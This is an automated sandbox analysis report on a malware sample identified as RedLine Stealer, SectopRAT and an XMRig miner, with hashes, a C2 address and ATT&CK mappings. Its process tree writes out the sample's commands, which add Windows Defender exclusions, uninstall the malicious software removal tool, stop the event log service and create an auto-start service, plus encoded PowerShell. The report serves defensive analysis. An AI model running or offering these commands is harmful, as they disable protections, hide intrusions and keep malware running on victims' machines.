redline | 61f3a2572f203c05366b5ddd6c208fe65b5e960f195689c456b742d7339c667c

General

Target

6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe
Size

2.6MB
MD5

55e393da1714013720ddf266c7906f43
SHA1

91a636913604184c010c2d9e0b331a804a2c0ab4
SHA256

6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957
SHA512

40a61e1d461717e45eff3be6b22561ac39c2ef1af39b46f7d149fe823d14a06bb99605a78e794d6447ece43ce6b4854192e47ad993ed4a2e78479bc7e155fe8a
SSDEEP

49152:VvONaX/Lpt/IvKfeF4tIDpdIA/gvCRtDKYZ8NfBcPQSqzULJgxl6Y4KB7KkP3C+Y:VGNajwvKfpyMdvCRNZZ8NJcPQSEU9Q6z

Score

10^/10

redline sectoprat xmrig tg discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

tg

C2

163.5.112.53:51523

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\b.exe	family_redline
behavioral1/memory/2588-22-0x00000000002A0000-0x00000000002BE000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\b.exe	family_sectoprat
behavioral1/memory/2588-22-0x00000000002A0000-0x00000000002BE000-memory.dmp	family_sectoprat

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2272-238-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-239-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-241-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-242-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-243-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-244-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-245-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-246-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-247-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-248-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2272-252-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

a.exeb.exewfnmgjmvvtwt.exe

pid process

2616 a.exe
2588 b.exe
476
2284 wfnmgjmvvtwt.exe

pid	process
2616	a.exe
2588	b.exe
476
2284	wfnmgjmvvtwt.exe

Loads dropped DLL 4 IoCs

Processes:

6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe

pid	process
2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe
2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe
2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe
476

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2272-233-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-234-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-235-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-236-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-237-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-238-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-239-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-241-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-242-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-243-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-244-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-245-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-246-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-247-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-248-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2272-252-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 4 IoCs

Processes:

powershell.exea.exepowershell.exewfnmgjmvvtwt.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	a.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	wfnmgjmvvtwt.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

wfnmgjmvvtwt.exe

description	pid	process	target process
PID 2284 set thread context of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 set thread context of 2272	2284	wfnmgjmvvtwt.exe	conhost.exe

Drops file in Windows directory 2 IoCs

Processes:

wusa.exewusa.exe

description ioc process

File created C:\Windows\wusa.lock wusa.exe
File created C:\Windows\wusa.lock wusa.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3036 sc.exe
1804 sc.exe
2864 sc.exe
1492 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

pid	process
3036	sc.exe
1804	sc.exe
2864	sc.exe
1492	sc.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0fec16efe84da01	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeb.exea.exepowershell.exewfnmgjmvvtwt.exepowershell.execonhost.exe

pid	process
2196	powershell.exe
2080	powershell.exe
2588	b.exe
2588	b.exe
2616	a.exe
756	powershell.exe
2616	a.exe
2616	a.exe
2616	a.exe
2616	a.exe
2616	a.exe
2284	wfnmgjmvvtwt.exe
2820	powershell.exe
2284	wfnmgjmvvtwt.exe
2284	wfnmgjmvvtwt.exe
2284	wfnmgjmvvtwt.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe
2272	conhost.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exeb.exepowershell.exepowershell.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2588	b.exe
Token: SeDebugPrivilege	756	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeLockMemoryPrivilege	2272	conhost.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.execmd.exewfnmgjmvvtwt.execmd.exe

description	pid	process	target process
PID 2264 wrote to memory of 2196	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2196	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2196	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2196	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2080	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2080	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2080	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2080	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	powershell.exe
PID 2264 wrote to memory of 2616	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	a.exe
PID 2264 wrote to memory of 2616	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	a.exe
PID 2264 wrote to memory of 2616	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	a.exe
PID 2264 wrote to memory of 2616	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	a.exe
PID 2264 wrote to memory of 2588	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	b.exe
PID 2264 wrote to memory of 2588	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	b.exe
PID 2264 wrote to memory of 2588	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	b.exe
PID 2264 wrote to memory of 2588	2264	6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe	b.exe
PID 568 wrote to memory of 1576	568	cmd.exe	wusa.exe
PID 568 wrote to memory of 1576	568	cmd.exe	wusa.exe
PID 568 wrote to memory of 1576	568	cmd.exe	wusa.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2200	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2556 wrote to memory of 2436	2556	cmd.exe	wusa.exe
PID 2556 wrote to memory of 2436	2556	cmd.exe	wusa.exe
PID 2556 wrote to memory of 2436	2556	cmd.exe	wusa.exe
PID 2284 wrote to memory of 2272	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2272	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2272	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2272	2284	wfnmgjmvvtwt.exe	conhost.exe
PID 2284 wrote to memory of 2272	2284	wfnmgjmvvtwt.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe
"C:\Users\Admin\AppData\Local\Temp\6f10a5ac32b9f8b590199dd88c976057d19a6215224aafe45270dd3154d4b957.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdABpACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAcABhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGkAcwAgAGMAbwBtAHAAdQB0AGUAcgAgAGkAcwAgAG4AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQALAAgAHAAbABlAGEAcwBlACAAdAByAHkAIABhAGcAYQBpAG4AIABvAG4AIABhAG4AbwB0AGgAZQByACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB5AGMAYQAjAD4A"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAagBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcAB5ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2616

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
4⤵
- Drops file in Windows directory
PID:1576

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "TDFIYZSJ"
3⤵
- Launches sc.exe
PID:1804

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "TDFIYZSJ" binpath= "C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe" start= "auto"
3⤵
- Launches sc.exe
PID:3036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:1492

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "TDFIYZSJ"
3⤵
- Launches sc.exe
PID:2864

C:\Users\Admin\AppData\Roaming\b.exe
"C:\Users\Admin\AppData\Roaming\b.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe
C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Drops file in Windows directory
PID:2436

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:2200

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Impair Defenses

1

T1562

Credential Access

Unsecured Credentials

2

T1552

Credentials In Files

2

T1552.001

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

2

T1005

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar326D.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3888.tmp
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp389E.tmp
Filesize
92KB

MD5
c38ea50a9d1b652272fdae5db82c9404

SHA1
d7444179c921d090b4e5d954997087bc0004e69f

SHA256
b5e3708f123a02f980e4e8397a055b98dceecdc754bbb67872e8bf3651541742

SHA512
b91d23e89ca310a4cc9bbfc9537880e1b0c09d0ebf28fa1514258110f3fe33493f24145430093c9d1eb6ddcac8ef25ed74eb0d0c2c8c0544c1cfe2dcf206e2f5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
e56f8993ab3b7a3a14d4d8d0f7e38a04

SHA1
e233976e3fac5ad1a9e985650e6d7db8ce7492b1

SHA256
28ec41f4723c46ee2b7791e8306002dba37131d04a10b92f59aa8d23452aa42d

SHA512
eac2c27f28652c289fe05a9089003e252f430bf7f4bd1f2e7c354fe8fcdce32cc481e0bfa53008d4394b6e56ccda8b818ce426fa1979dc2e4fad1acde77997b7

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe
Filesize
2.5MB

MD5
6fd62e635b39a02ba8cac6fc124c9475

SHA1
e13080b9cc546e44a9f1c419ba86aeb190a14b2d

SHA256
78b9d7e485026278b02a1961999ad99cdfa988fbf4403767db5d10d1473e9870

SHA512
e77432582e6abcc0fd86ed997c9c4619bd67a044d33a752e1cf3ceb8008cea27c540949183b80f9dee8a41614cff54afe79c5db294efcb72b27685fcf1010cdc

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\b.exe
Filesize
95KB

MD5
184ac479b3a878e9ac5535770ca34a2b

SHA1
1f99039911cc2cfd1a62ce348429ddd0f4435a60

SHA256
8e28a0090832a76cf71c417cb1bf7990b9af86be258b732117a47f624387083c

SHA512
e0f5185ae890b902ea5325066df23959106712e7990e120a1b9752bbd0331cac968af5ddd6092f75a1c576d4c83f4093dfbf53a2c90870d1c02b31a0e8282bb4

Download Submit
memory/756-204-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/756-207-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/756-208-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/756-206-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/756-203-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/756-202-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/756-200-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

Filesize
32KB

Download
memory/756-201-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/756-199-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2080-30-0x0000000072AA0000-0x000000007304B000-memory.dmp

Filesize
5.7MB

Download
memory/2080-25-0x0000000002A30000-0x0000000002A70000-memory.dmp

Filesize
256KB

Download
memory/2080-23-0x0000000072AA0000-0x000000007304B000-memory.dmp

Filesize
5.7MB

Download
memory/2080-27-0x0000000072AA0000-0x000000007304B000-memory.dmp

Filesize
5.7MB

Download
memory/2196-29-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Filesize
256KB

Download
memory/2196-31-0x0000000072AA0000-0x000000007304B000-memory.dmp

Filesize
5.7MB

Download
memory/2196-24-0x0000000072AA0000-0x000000007304B000-memory.dmp

Filesize
5.7MB

Download
memory/2196-26-0x0000000072AA0000-0x000000007304B000-memory.dmp

Filesize
5.7MB

Download
memory/2200-225-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2200-224-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2200-228-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2200-226-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2200-227-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2200-230-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2272-238-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-246-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-254-0x0000000000FC0000-0x0000000000FE0000-memory.dmp

Filesize
128KB

Download
memory/2272-253-0x0000000000760000-0x0000000000780000-memory.dmp

Filesize
128KB

Download
memory/2272-252-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-250-0x0000000000FC0000-0x0000000000FE0000-memory.dmp

Filesize
128KB

Download
memory/2272-249-0x0000000000760000-0x0000000000780000-memory.dmp

Filesize
128KB

Download
memory/2272-233-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-234-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-235-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-236-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-248-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-247-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-245-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-244-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-243-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-237-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-242-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-239-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2272-240-0x00000000000F0000-0x0000000000110000-memory.dmp

Filesize
128KB

Download
memory/2272-241-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2588-251-0x00000000723B0000-0x0000000072A9E000-memory.dmp

Filesize
6.9MB

Download
memory/2588-28-0x00000000723B0000-0x0000000072A9E000-memory.dmp

Filesize
6.9MB

Download
memory/2588-205-0x00000000723B0000-0x0000000072A9E000-memory.dmp

Filesize
6.9MB

Download
memory/2588-22-0x00000000002A0000-0x00000000002BE000-memory.dmp

Filesize
120KB

Download
memory/2820-215-0x0000000019EF0000-0x000000001A1D2000-memory.dmp

Filesize
2.9MB

Download
memory/2820-217-0x00000000009D0000-0x00000000009D8000-memory.dmp

Filesize
32KB

Download
memory/2820-218-0x0000000001600000-0x0000000001680000-memory.dmp

Filesize
512KB

Download
memory/2820-220-0x0000000001600000-0x0000000001680000-memory.dmp

Filesize
512KB

Download
memory/2820-223-0x000007FEF49A0000-0x000007FEF533D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-219-0x000007FEF49A0000-0x000007FEF533D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-222-0x0000000001600000-0x0000000001680000-memory.dmp

Filesize
512KB

Download
memory/2820-216-0x000007FEF49A0000-0x000007FEF533D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-221-0x0000000001600000-0x0000000001680000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads